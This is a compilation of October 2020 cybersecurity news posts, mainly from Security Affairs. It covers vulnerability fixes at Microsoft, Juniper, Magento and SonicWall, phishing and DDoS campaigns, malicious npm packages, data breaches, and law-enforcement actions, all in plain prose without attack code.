The CVE-2020-17022 is a remote code execution vulnerability that exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker can exploit the vulnerability to execute arbitrary code.

“Exploitation of the vulnerability requires that a program process a specially crafted image file.” reads the advisory. “The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory.”

The CVE-2020-17022 vulnerability affects all devices running Windows 10, version 1709 or later, and a vulnerable library version.

Windows 10 devices are not affected in their default configuration and that “only customers who have installed the optional HEVC or ‘HEVC from Device Manufacturer’ media codecs from Microsoft Store may be vulnerable.”

The CVE-2020-17022 flaw was reported to Microsoft by Dhanesh Kizhakkinan from FireEye.

The CVE-2020-17023 vulnerability is a remote code execution vulnerability that exists in Visual Studio Code. An attacker can trigger the flaw by tricking a user into opening a malicious ‘package.json’ file, then he could run arbitrary code in the context of the current user.

“If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the advisory.

“To exploit this vulnerability, an attacker would need to convince a target to clone a repository and open it in Visual Studio Code. Attacker-specified code would execute when the target opens the malicious ‘package.json’ file. The update address the vulnerability by modifying the way Visual Studio Code handles JSON files.”

The CVE-2020-17023 vulnerability was reported by Justin Steven.

The IT giant did not provide any mitigating measures or workarounds for the two vulnerabilities.

According to Microsoft, both vulnerabilities are not being exploited in the wild.

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft Windows)

The post Microsoft released out-of-band Windows fixes for 2 RCE issues appeared first on Security Affairs.

Iran-linked Silent Librarian APT targets universities again

Iran-linked cyberespionage group Silent Librarian has launched a new phishing campaign aimed at universities around the world.

Iran-linked APT group Silent Librarian has launched another phishing campaign targeting universities around the world.

The Silent Librarian, also tracked as Cobalt Dickens and TA407, targeted tens of universities in four continents in the last couple of years.

In August 2018, the security firm SecureWorks uncovered a phishing campaign carried out by the APT group targeting universities worldwide. The operation involved sixteen domains hosting more than 300 spoofed websites for 76 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States.

Since mid-September, researchers from Malwarebytes observed a new spear-phishing campaign carried out by the group that is expanding its target list to include more countries.

Silent Librarian hackers targeted both employees and students at the universities, experts noticed that the threat actor set up a new infrastructure to avoid a takeover.

“Considering that Iran is dealing with constant sanctions, it strives to keep up with world developments in various fields, including that of technology. As such, these attacks represent a national interest and are well funded,” states Malwarebytes. “The new domain names follow the same pattern as previously reported, except that they swap the top level domain name for another.”

The threat actor used domain names following a pattern observed in past campaigns, although they use a different top-level domain name (the “.me” TLD instead of “.tk” and “.cf”).

Silent Librarian

The hackers use Cloudflare for phishing hostnames in an attempt to hide the real hosting origin. Anyway, Malwarebytes was able to identify some of the infrastructure which was located in Iran, likely because it is considered a bulletproof hosting option due to the lack of cooperation between US and European law enforcement and local police in Iran.

“Clearly we only uncovered a small portion of this phishing operation. Although for the most part the sites are taken down quickly, the attacker has the advantage of being one step ahead and is going for many possible targets at once,” Malwarebytes concludes.

The security firm also published Indicators of Compromise (IoCs) for this campaign.

Pierluigi Paganini

(SecurityAffairs – hacking, Silent Librarian)

The post Iran-linked Silent Librarian APT targets universities again appeared first on Security Affairs.

Security Affairs newsletter Round 286

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Hackers targeted the US Census Bureau network, DHS report warns
Tyler Technologies finally paid the ransom to receive the decryption key
Underestimating the FONIX – Ransomware as a Service could be an error
APT groups chain VPN and Windows Zerologon bugs to attack US government networks
Microsoft partnered with other security firms to takedown TrickBot botnet
Researchers found alleged sensitive documents of NATO and Turkey
Researchers received $288,500 for 32 out of 55 issues reported to Apple
Adobe addresses a critical security flaw in Adobe Flash Player
Five Eyes nations plus India and Japan call for encryption backdoor once again
IoT Cybersecurity: 5 Major Vulnerabilities and How to Tackle Them
Leading Law firm Seyfarth Shaw discloses ransomware attack
Microsoft October 2020 Patch Tuesday fixes 87 flaws, including 21 RCEs
The British government aims at improving its offensive cyber capability
German authorities raid the offices of the FinFisher surveillance firm
Google researcher found BleedingTooth flaws in Linux Bluetooth
Norway blames Russia for cyber attack on Parliament
Talos experts disclosed unpatched DoS flaws in Allen-Bradley adapter
The G7 expresses its concern over ransomware attacks
Crooks hit Puerto Rico Firefighting Department Servers
Egregor ransomware gang leaked data alleged stolen from Ubisoft, Crytek
Iran acknowledged cyberattacks on two governmental departments
U.S. Bookstore giant Barnes & Noble hit by cyberattack
Zoom now supports end-to-end encrypted (E2EE) calls
Adobe fixes Magento flaws that can lead to code execution
Almost 800,000 SonicWall VPN appliances online are vulnerable to CVE-2020-5135
Breach at Dickeys Barbecue Pit compromises 3 million Cards
Britains information commissioner fines British Airways for 2018 Hack
Juniper fixes tens of flaws affecting the Junos OS

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 286 appeared first on Security Affairs.

QQAAZZ crime gang charged for laundering money stolen by malware gangs

Multiple members of QQAAZZ multinational cybercriminal gang were charged for providing money-laundering services to high-profile malware operations.

20 members of the multinational cybercriminal group QQAAZZ were charged this week in the US, Portugal, Spain, and the UK for providing money-laundering services.

The arrests are the result of an unprecedented international law enforcement operation, coordinated by the Europol and dubbed Operation 2BaGoldMule, involving agencies from 16 countries. The police executed more than 40 house searches in Latvia, Bulgaria, the United Kingdom, Spain, and Italy.

The police also seized an extensive bitcoin mining operation in Bulgaria associated with QQAAZZ.

According to law enforcement bodies, the gang provides services to multiple malware operations, including Dridex, GozNym, and Trickbot.

QQAAZZ attempted to launder tens of millions stolen from victims starting with 2016 by the world’s foremost cybercriminals.

“Comprised of several layers of members mainly from Latvia, Georgia, Bulgaria, Romania, and Belgium, the QQAAZZ network opened and maintained hundreds of corporate and personal bank accounts at financial institutions throughout the world to receive money from cybercriminals who stole it from accounts of victims.” reads the press release published by Europol. “The funds were then transferred to other QQAAZZ-controlled bank accounts and sometimes converted to cryptocurrency using ‘tumbling’ services designed to hide the original source of the funds.  After taking a fee of up to 50-percent, QQAAZZ returned the balance of the stolen funds to their cybercriminal clientele.”  

The QQAAZZ gang advertised its services as a ‘global, complicit bank drops service’ on multiple Russian-speaking online cybercriminal forums.

QQAAZZ gang

The member of the gang used instant messaging apps to instruct their client on how to transfer the stolen funds to bank accounts under their control. The bank accounts were opened by money mules using fake and legitimate Polish and Bulgarian ID documents.

QQAAZZ also leverages dozens of shell companies to open other bank accounts.

The money laundering operation involved hundreds of corporate and personal bank accounts at financial institutions throughout the world.

Some of the money was also “converted to cryptocurrency using ‘tumbling’ services designed to hide the original source of the funds.”

“The funds were then transferred to other QQAAZZ-controlled bank accounts and sometimes converted to cryptocurrency using “tumbling” services designed to hide the original source of the funds.” states the DoJ. “After taking a fee of up to 40 to 50 percent, QQAAZZ returned the balance of the stolen funds to their cybercriminal clientele.”

“Cybercriminals are constantly exploring new possibilities to abuse technology and financial frameworks to victimise millions of users in a moment from anywhere in the world,” said Edvardas Šileris, Head of Europol’s European Cybercrime Centre.

“Today’s operation shows how through a proper law enforcement international coordination we can turn the table on these criminals and bring them to justice.”

Pierluigi Paganini

(SecurityAffairs – hacking, QQAAZZ cybercrime gang)

The post QQAAZZ crime gang charged for laundering money stolen by malware gangs appeared first on Security Affairs.

TikTok launched a public bug bounty program

Chinese video-sharing social networking service TikTok announced this week the launch of a public bug bounty program in collaboration with HackerOne.

The popular Chinese video-sharing social networking service TikTok has launched this week a public bug bounty program through the HackerOne platform.

White hat hackers are invited to report security flaws in TikTok websites, including several subdomains, and both Android and iOS apps.

The company is offering between $1,700 and $6,900 for high-severity flaws, the payout for a critical issue can go up to $14,800.

“We encourage security researchers to focus their efforts on finding security vulnerabilities demonstrating meaningful impact. Our rewards are based on severity per CVSS (the Common Vulnerability Scoring Standard).” reads the program description.

The idea to reward white hat hackers for reporting security flaws is not new for the Chinese firm that claimed to have already paid out more than $40,000 through its bug bounty program.

The company has had a Vulnerability Reporting Policy and follows a Coordinated Disclosure Policy with a waiting period of 90 days from submission.

“This partnership will help us to gain insight from the world’s top security researchers, academic scholars and independent experts to better uncover potential threats and make our security defenses even stronger,” said Luna Wu of TikTok’s Global Security Team.

tiktok
Source: Messagero

President Trump is trying to ban TikTok in the United States due to security and privacy concerns. TikTok has denied any accusation of sharing data with the Beijing government. TikTok confirmed that all US user data is stored in the US, with a backup in Singapore.

TikTok challenged the decision in a US court and the judge blocked the President’s request to ban the Chinese company in the country.

The US Government is making pressure on TikTok’s parent firm Bytedance to sell its U.S. operations to an American company.

Pierluigi Paganini

(SecurityAffairs – hacking, TikTok)

The post TikTok launched a public bug bounty program appeared first on Security Affairs.

Four npm packages found opening shells and collecting info on Linux, Windows systems

On Thursday, four JavaScript packages have been removed from the npm portal because they have been found containing malicious code.

NPM staff removed four JavaScript packages from the npm portal because were containing malicious code. Npm is the largest package repository for any programming language.

The four packages, which had a total of one thousand of downloads, are:

“Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer,” the npm security team said.

“The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it,”

The researcher AX Sharma, who analyzed the packages, revealed that plutov-slack-clientnodetest1010, and nodetest199 share identical code.

Experts warn that systems running applications that imported one of these packages should be potentially compromised because the three JavaScript libraries opened web shells on the computers running them.

web shell is a code, often written in typical web development programming languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to gain remote access and code execution.

The npmpubman, unlike the other packages, was found collecting user data from the environment variables and uploads the gathered info to a remote host.

The malicious code could work on both Windows and *nix operating systems, including major distros, including Linux, FreeBSD, OpenBSD.

One of the packages was uploaded on the npm portal in May, while the remaining ones were uploaded in September 2018.

“It is possible that all four packages were authored by the same attacker(s) despite conflicting data provided in the package.json manifests.” reported Bleeping Computer.

“In a real-world scenario, npmpubman could be used as a part of an attacker’s reconnaissance efforts to collect information about a system, whereas the other packages establish a direct connection between the attacker’s and the victim’s computers.”

In August, the npm security team has removed the JavaScript library “fallguys” from the npm portal because it was containing a malicious code used to steal sensitive files from an infected users’ browser and Discord application.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Four npm packages found opening shells and collecting info on Linux, Windows systems appeared first on Security Affairs.

Google warned users of 33,015 nation-state attacks since January

Google delivered over 33,000 alerts to its users during the first three quarters of 2020 to warn them of attacks from nation-state actors.

Google delivered 33,015 alerts to its users during the first three quarters of 2020 to warn them of phishing attacks, launched by nation-state actors, targeting their accounts.

Google sent 11,856 government-backed phishing warnings during Q1 2020, 11,023 in Q2 2020, and 10,136 in Q3 2020.

Shane Huntley, Director at Google’s Threat Analysis Group (TAG), revealed that her team has shared its findings with the campaigns and the Federal Bureau of Investigation.

The IT giant pointed out that major events like elections and COVID-19 represent opportunities for threat actors.

The trend in the nation-state attacks is consistent with what others have subsequently reported.

Google TAG report nation-state actors

“Overall, we’ve seen increased attention on the threats posed by APTs in the context of the U.S. election. U.S government agencies have warned about different threat actors, and we’ve worked closely with those agencies and others in the tech industry to share leads and intelligence about what we’re seeing across the ecosystem.” reads the report published by Google TAG.

Since last summer, TAG team has tracked a large spam network linked to China that is running an influence operation on multiple platforms, primarily on YouTube. The threat actor behind this campaign was primarily acquiring or hijacking existing accounts and using them to spread content crafted for their intent.

According to Google, the alerts are shown to up to 0.1% of all Gmail accounts. The company’s alert advises Gmail users to take several measures to secure their accounts, such as enrolling in the Advanced Protection Program, keeping software up to date, enabling Gmail 2-step verification, as well as using Google Authenticator and/or a physical security key for 2-step verification.

As the course of the COVID-19 pandemic evolves, Google experts warn of threat actors evolving their tactics as well. During the last summer, Google observed threat actors from China, Russia, and Iran targeting pharmaceutical companies and researchers involved in the development of a vaccine. 

In September, Google experts started to observe attacks carried out by multiple North Korea-linked APT groups aimed at COVID-19 researchers and pharmaceutical companies, especially those based in South Korea.

This week, the Google Cloud team revealed that in September 2017 it has mitigated DDoS attack that reached 2.54 Tbps, the largest DDoS attack of ever.

This attack is the largest DDoS attack recorded to date and according to a report published by the Google Threat Threat Analysis Group (TAG) it was carried out by a state-sponsored threat actor.

Pierluigi Paganini

(SecurityAffairs – hacking, Google TAG)

The post Google warned users of 33,015 nation-state attacks since January appeared first on Security Affairs.

UK NCSC recommends organizations to fix CVE-2020-16952 SharePoint RCE flaw asap

The U.K. National Cyber Security Centre (NCSC) issued an alert to urge organizations to patch CVE-2020-16952 RCE vulnerability in MS SharePoint Server.

The U.K. National Cyber Security Centre (NCSC) issued an alert to warn of the risks of the exploitation for the CVE-2020-16952 remote code execution (RCE) vulnerability in Microsoft SharePoint Server and urges organizations to address the flaw.

Attackers could exploit this vulnerability to run arbitrary code and execute operations in the context of the local administrator on vulnerable SharePoint servers.

The issue is caused by the improper validation in user-supplied data and can be exploited when a user uploads a specially crafted SharePoint application package to a vulnerable version of SharePoint.

The vulnerability affects Microsoft SharePoint Foundation 2013 Service Pack 1, Microsoft SharePoint Enterprise Server 2016, and Microsoft SharePoint Server 2019, while SharePoint Online as part of Office 365 is not impacted.

“The NCSC strongly advises that organizations refer to the Microsoft guidance referenced in this alert and ensure the necessary updates are installed in affected SharePoint products,” reads the alert. “The NCSC generally recommends following vendor best practice advice in the mitigation of vulnerabilities. In the case of this SharePoint vulnerability, it is important to install the latest updates as soon as practicable.”

The server-side include (SSI) vulnerability CVE-2020-16952 was reported by the researcher Steven Seeley from Qihoo 360 Vulcan Team, who also provided a proof-of-concept exploit for the RCE flaw.

An exploit module for the open-source Metasploit penetration testing framework was also available, it works on SharePoint 2019 on Windows Server 2016.

Security experts recommend applying the October 2020 SharePoint security updates ([1],[2],[3]).

Experts pointed out that SharePoint servers are used in enterprise environments, for this reason, such kind of vulnerabilities is very dangerous.

The UK NCSC confirms that both CVE-2020-16952 and CVE-2015-1641 flaws are included in the list of most exploited vulnerabilities since 2016 published in a joint advisory by the US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI).

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2020-16952)

The post UK NCSC recommends organizations to fix CVE-2020-16952 SharePoint RCE flaw asap appeared first on Security Affairs.

Google mitigated a 2.54 Tbps DDoS attack in 2017, the largest DDoS ever seen

The Google Cloud team revealed that in September 2017 it has mitigated DDoS attack that reached 2.54 Tbps, the largest DDoS attack of ever.

The Google Cloud team revealed that back in September 2017 it has mitigated a powerful DDoS attack that clocked at 2.54 Tbps.

This attack is the largest distributed denial of service attack recorded to date.

“Our infrastructure absorbed a 2.5 Tbps DDoS in September 2017, the culmination of a six-month campaign that utilized multiple methods of attack. Despite simultaneously targeting thousands of our IPs, presumably in hopes of slipping past automated defenses, the attack had no impact.” reads the post published by Damian Menscher, a Security Reliability Engineer for Google Cloud.

“The attacker used several networks to spoof 167 Mpps (millions of packets per second) to 180,000 exposed CLDAP, DNS, and SMTP servers, which would then send large responses to us.”

DDoS

Google researchers pointed out that the attack they mitigated was four times larger than the 623 Gbps attack launched from the Mirai botnet in 2016.

Experts noticed that this attack is bigger than the 2.3 Tbps DDoS attack mitigated by Amazon’s AWS in February.

A report published by the Google Threat Threat Analysis Group (TAG) speculates that the attack was carried out by a state-sponsored threat actor.

“we’ve seen bigger players increase their capabilities in launching large-scale attacks in recent years. For example in 2017, our Security Reliability Engineering team measured a record-breaking UDP amplification attack sourced out of several Chinese ISPs (ASNs 4134, 4837, 58453, and 9394), which remains the largest bandwidth attack of which we are aware.” reads the report published by Google.

Menscher revealed that the attack was part of a campaign that leveraged multiple DDoS amplification methods to hit Google’s servers.

Google decided to disclose the DDoS attack today to warn of an increasing trend of state-sponsored actors abusing DDoS attacks to target online resources.

Experts believe that DDoS attacks are becoming even more dangerous and would intensify in the coming years.

Pierluigi Paganini

(SecurityAffairs – hacking, distributed denial of service)

The post Google mitigated a 2.54 Tbps DDoS attack in 2017, the largest DDoS ever seen appeared first on Security Affairs.

Threat Roundup for October 9 to October 16

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between October 9 and October 16. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201016-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 9 to October 16 appeared first on Cisco Blogs.

Juniper fixes tens of flaws affecting the Junos OS

Juniper Networks has addressed tens of vulnerabilities, including serious flaws that can be exploited to take over vulnerable systems.

Juniper Networks has addressed tens of vulnerabilities, including serious issues that can be exploited to take control of vulnerable systems.

The vendor has published 40 security advisories related to security vulnerabilities in the Junos OS operating system that runs on Juniper’s firewalls and other third-party components.

The vendor addressed multiple critical flaws in the Juniper Networks Mist Cloud UI. The vulnerabilities affect the Security Assertion Markup Language (SAML) authentication, they could be exploited by a remote attacker to bypass SAML authentication.

“Juniper Networks Mist Cloud UI, when SAML authentication is enabled, may incorrectly handle SAML responses, allowing a remote attacker to bypass SAML authentication security controls.” reads the security advisory published by Juniper.

“If SAML authentication is not enabled, the product is not affected. These vulnerabilities can be exploited alone or in combination. The CVSS score below represents the worst case chaining of these vulnerabilities.”

Multiple vulnerabilities in Juniper Networks Junos OS have been fixed by updating third party software included with Junos OS devices.

Juniper fixed a critical remote code execution vulnerability in Telnet server tracked as CVE-2020-10188.

“A vulnerability in the telnetd Telnet server allows remote attackers to execute arbitrary code via short writes or urgent data, because of a buffer overflow involving the netclear and nextitem functions.” reads the advisory.

“This issue only affects systems with inbound Telnet service enabled. SSH service is unaffected by this vulnerability.”

The company also addressed high-severity denial-of-service (DoS) and arbitrary code execution issues.

The good news is that Juniper is not aware of attacks in the wild exploiting the vulnerabilities.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also urges organizations to apply the security updates released by the vendor.

“Juniper Networks has released security updates to address vulnerabilities affecting multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected system.” reads alert issued by CISA.

“The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Juniper Networks security advisories page and apply the necessary updates.”

Pierluigi Paganini

(SecurityAffairs – hacking, Junos)

The post Juniper fixes tens of flaws affecting the Junos OS appeared first on Security Affairs.

Britain’s information commissioner fines British Airways for 2018 Hack

Britain’s information commissioner has fined British Airways 20 million pounds for the 2018 hack that exposed data of 400,000 customers.

In September 2018, British Airways suffered a data breach that exposed the personal information of 400,000 customers.

The hackers potentially accessed the personal data of approximately 429,612 customers and staff. Exposed data included names, addresses, payment card numbers and CVV numbers of 244,000 BA customers.

Experts believe the hackers also accessed the combined card and CVV numbers of 77,000 customers and card numbers only for 108,000 customers.

An investigation conducted by researchers at RiskIQ revealed that the attack on the airline was carried out by the notorious crime gang MageCart.

Now Britain’s information commissioner (British ICO) has fined British Airways 20 million pounds (approximately $25 million) for failing to protect personal data belonging to its customers. This is the largest fine the British ICO has ever issued.

The ICO fined the airline because the company failed in implementing adequate security measures, the company detected the security breach to months later the initial compromise.

“People entrusted their personal details to BA and BA failed to take adequate measures to keep those details secure.” said Information Commissioner Elizabeth Denham.

“Their failure to act was unacceptable and affected hundreds of thousands of people, which may have caused some anxiety and distress as a result. That’s why we have issued BA with a £20m fine – our biggest to date.”

“When organisations take poor decisions around people’s personal data, that can have a real impact on people’s lives. The law now gives us the tools to encourage businesses to make better decisions about data, including investing in up-to-date security.”

The ICO issued the penalty under the Data Protection Act 2018 for infringements of the GDPR.

Let’s remind that under the European Union’s General Data Protection Rules imposed in 2018, organizations face fines of up to 20 million euros ($23 million) or 4% of annual global turnover.

“The ICO has specific responsibilities set out in the Data Protection Act 2018, the General Data Protection Regulation (GDPR), the Freedom of Information Act 2000, Environmental Information Regulations 2004 and Privacy and Electronic Communications Regulations 2003. This penalty was issued under the Data Protection Act 2018 for infringements of the GDPR.” concludes the ICO.

Pierluigi Paganini

(SecurityAffairs – hacking, British Airways)

The post Britain’s information commissioner fines British Airways for 2018 Hack appeared first on Security Affairs.

Breach at Dickey’s Barbecue Pit compromises 3 million Cards

Dickey’s Barbecue Pit, the largest barbecue restaurant chain in the US, suffered a POS breach, card details for 3 Million customers were posted online.

Dickey’s Barbecue Pit is a family-owned American barbecue restaurant chain, the company suffered a POS breach and card details of more than three million customers have been posted on the carding portal Joker’s Stash.

The huge trove of payment card data was spotted by researchers from the cyber-security firm Gemini Advisory.

The Joker’s Stash dark web marketplace is one of the most popular carding websites, it is known for advertising and card details from major breaches.

The card details of Dickey’s Barbecue Pit‘s customers were included in a dump titled “BLAZINGSUN.” JokerStash originally claimed that the breach would be available in August, then again in September, and finally it was posted online on October 12.

“Gemini Advisory determined that the compromised point of purchase (CPP) was Dickey’s Barbecue Pit, a US-based restaurant franchise.” reads the post published by Gemini Advisory.

“The advertisement claimed that BLAZINGSUN would contain 3 million compromised cards with both track 1 and track 2 data. They purportedly came from 35 US states and “some” countries across Europe and Asia.”

This BLAZINGSUN breach contains 3 million compromised payment records that are available for a median price of $17 per card.

The experts worked with several partner financial institutions who independently confirmed the authenticity of the stolen data.

According to Gemini, the hackers obtained the card details after compromised the in-store Point-of-Sale (POS) system used at Dickey’s Barbecue Pit restaurants.

Crooks compromised 156 of Dickey’s 469 locations across 30 states, most of them in California and Arizona.

Dickey’s locations are marked by the blue restaurant icon while the locations confirmed to be compromised are marked in red.

The compromise took place between July 2019 and August 2020. Gemini reported that the root cause of the security breach was the use of the outdated magstripe method for payment transactions, which exposed car holders to PoS malware attacks.

The company published an official statement that confirmed that it has immediately started the incident response procedure.

We received a report indicating that a payment card security incident may have occurred. We are taking this incident very seriously and immediately initiated our response protocol and an investigation is underway. We are currently focused on determining the locations affected and time frames involved.” reads the statement provided by the company. “We are utilizing the experience of third parties who have helped other restaurants address similar issues and also working with the FBI and payment card networks. We understand that payment card network rules generally provide that individuals who timely report unauthorized charges to the bank that issued their card are not responsible for those charges.” 

The payment card records are mostly for cards using outdated magstripe technologies and are being sold for a median price of $17 per card.

“Based on previous Joker’s Stash major breaches, the records from Dickey’s will likely continue to be added to this marketplace over several months.”concludes the post.

Pierluigi Paganini

(SecurityAffairs – hacking, Dickey’s Barbecue Pit)

The post Breach at Dickey’s Barbecue Pit compromises 3 million Cards appeared first on Security Affairs.

Adobe fixes Magento flaws that can lead to code execution

Adobe released a series of out-of-band security fixes to address multiple Magento vulnerabilities that lead to code execution, customer list tampering.

Adobe has released a series of out-of-band security fixes to address multiple Magento vulnerabilities that lead to code execution, customer list tampering.

Eight of the vulnerabilities are considered either critical or important, only one is considered a moderate-severity flaw. The critical flaws are tracked as CVE-2020-24407 and CVE-2020-24400.

Below the list of affected versions:

ProductVersionPlatform
Magento Commerce 2.3.5-p1 and earlier versions  All
Magento Commerce 2.4.0 and earlier versions All
Magento Open Source 2.3.5-p1 and earlier versionsAll
Magento Open Source 2.4.0 and earlier versions All

One of the critical flaws addressed by Adobe is a file upload issue that can allow list bypass. Another critical SQL injection issue can lead to the execution of arbitrary code or arbitrary read/write database access. Both issues require an attacker to have already obtained admin privileges. 

Adobe has also addressed a vulnerability, tracked as CVE-2020-24402, that can allow attackers to manipulate and modify customer lists. 

Other flaws fixed by Adobe include a stored cross-site scripting (XSS) issue (CVE-2020-24408), a user session invalidation bug (CVE-2020-24401), and a security vulnerability that allows Magento CMS pages to be modified without permission (CVE-2020-24404). The company also addressed two restricted resource access bugs, tracked as CVE-2020-24405 and CVE-2020-24403 respectively, and unintended disclosure of a document root path that could lead to sensitive information disclosure (CVE-2020-24406).

This week, Adobe has also released a security update to address a critical remote code execution flaw in Adobe Flash Player (CVE-2020-9746) that could be exploited by threat actors by tricking the victims into visiting a website.

Attackers could exploit this flaw by simply inserting malicious strings in HTTP responses while unaware users visit a website.

Pierluigi Paganini

(SecurityAffairs – hacking, Adobe)

The post Adobe fixes Magento flaws that can lead to code execution appeared first on Security Affairs.

U.S. Federal Court Issues Restraining Order against Tech Support Scheme

A federal court in the United States issued a temporary restraining order against a tech support scheme that’s alleged to have targeted U.S. consumers. On October 15, the U.S. District Court filed Southern District of Florida submitted a complaint against Michael Brian Cotter, 59, of Glendale, California. The complaint alleged that Cotter had worked with […]… Read More

The post U.S. Federal Court Issues Restraining Order against Tech Support Scheme appeared first on The State of Security.

Almost 800,000 SonicWall VPN appliances online are vulnerable to CVE-2020-5135

The Tripwire VERT security team spotted almost 800,000 SonicWall VPN appliances exposed online that are vulnerable to the CVE-2020-5135 RCE flaw.

Security experts from the Tripwire VERT security team have discovered 795,357 SonicWall VPN appliances that were exposed online that are vulnerable to the CVE-2020-5135 RCE flaw.

“A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.” reads the advisory published by SonicWall.

The CVE-2020-5135 is a stack-based buffer overflow that affects the SonicWall Network Security Appliance (NSA). The vulnerability can be exploited by an unauthenticated HTTP request involving a custom protocol handler.

The flaw resides in the HTTP/HTTPS service used for product management as well as SSL VPN remote access.

“An unskilled attacker can use this flaw to cause a persistent denial of service condition. Tripwire VERT has also confirmed the ability to divert execution flow through stack corruption indicating that a code execution exploit is likely feasible.” reads the analysis published by Tripwire. “This flaw exists pre-authentication and within a component (SSLVPN) which is typically exposed to the public Internet.”

This vulnerability is very dangerous, especially during the COVID-19 pandemic because SonicWall NSA devices are used as firewalls and SSL VPN portals allow employees to access corporate networks.

The vulnerability affects the following versions:

  • SonicOS 6.5.4.7-79n and earlier
  • SonicOS 6.5.1.11-4n and earlier
  • SonicOS 6.0.5.3-93o and earlier
  • SonicOSv 6.5.4.4-44v-21-794 and earlier
  • SonicOS 7.0.0.0-1

Security experts from Tenable have published a post detailing the flaw, they also shared Shodan dorks for searching SonicWall VPNs.

“Our own Shodan search for vulnerable SonicWall devices led us to two specific search queries:

The combined results from Shodan using these search queries led to a total of 795,674 hosts. In the VERT advisory, they specified that 795,357 hosts were vulnerable.” wrote Tenable.

At the time of this post, the first search query provides 448,400 results, the second one 24,149, most of the vulnerable devices are in the United States.

SonicWall has already released updates to address the flaw, the company also recommends to disconnect SSL VPN portals from the Internet as temporary mitigation before installing one of the following versions:

  • SonicOS 6.5.4.7-83n
  • SonicOS 6.5.1.12-1n
  • SonicOS 6.0.5.3-94o
  • SonicOS 6.5.4.v-21s-987
  • Gen 7 7.0.0.0-2 and onwards

The CVE-2020-5135 is a critical vulnerability rated as 9.4 out of 10, it could be easily exploited by unauthenticated attackers.

At the time this post was published, no PoC exploit code was available for the CVE-2020-5135 flaw.

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2020-5135)

The post Almost 800,000 SonicWall VPN appliances online are vulnerable to CVE-2020-5135 appeared first on Security Affairs.

Iran acknowledged cyberattacks on two governmental departments

Iran ’s cybersecurity authority revealed that two governmental departments were hit by cyberattacks this week, state media reported.

State media reported on Thursday that Iran’s cybersecurity authority acknowledged cyberattacks on two unnamed governmental departments.

The state-owned IRAN daily newspaper revealed that the cyberattacks took place on Tuesday and Wednesday respectively.

Iranian authorities are investigating the attacks that were defined as important.

Other governmental departments temporarily took down their online operation as a precaution measure.

Iran’s cybersecurity authority did not attribute the attack to a specific threat actor

This isn’t the first time that Irans‘ authorities claim to have been targeted by cyber attacks. In December 2019, the Iran telecommunications minister announced for two times in a week to have foiled a cyber attack against its infrastructure.

At the time, the Iranian minister Mohammad Javad Azari-Jahromi confirmed that the attack was neutralized by the national cyber shield, it also added that the attack was launched by the China-linked APT27 group seeking for gathering intelligence its country.

In October 2019, Iran announced it was fearing retaliation from Western countries that are accusing it to carry out physical and cyber attacks against their infrastructure and countries in the Middle East.

At the time, Iran’s oil ministry said that the Government of Washington has launched a full-scale economic war” against the Islamic Republic in retaliation for the shooting down of a US drone as well as attacks on oil tankers that the US has blamed Iran.

Tensions between Tehran and Washington have escalated since 2018 when President Trump reimposed sanctions on Iran. The situation went out of control after a US drone strike killed top Iranian general Qasem Soleimani in January.

The order to kill Soleimani was issued by President Trump that said Soleimani was planning an “imminent” attack on US personnel in Baghdad.

In January, the U.S. Department of Homeland Security (DHS) has issued warnings about the possibility of cyber-attacks launched by Iran-linked threat actors. The attacks could be the response of Teheran after Maj. Gen. Qassim Suleimani was killed by a U.S. drone airstrike at the Baghdad airport in Iraq.

Pierluigi Paganini

(SecurityAffairs – hacking, Iran)

The post Iran acknowledged cyberattacks on two governmental departments appeared first on Security Affairs.

Crooks hit Puerto Rico Firefighting Department Servers

Puerto Rico’s firefighting department discloses a security breach, hackers breached its database and demanded $600,000.

Puerto Rico’s firefighting department discloses a security breach, hackers breached its database and demanded a $600,000 ransom.

According to the department’s director, Alberto Cruz, the ability of the department to respond to emergencies was not impacted by the attack.

The department received an email from the threat actors that notifies it that they had encrypted its servers and demanded the payment of a ransom to release them.

Local police launched an investigation into the incident, while the department decided to don’t pay the ransom.

“The department contacted police and have not paid the money, officials said. The investigation is ongoing.” reported the Associated Press.

Pierluigi Paganini

(SecurityAffairs – hacking, Puerto Rico’s firefighting department)

The post Crooks hit Puerto Rico Firefighting Department Servers appeared first on Security Affairs.

Barnes & Noble warns customers it has been hacked, customer data may have been accessed

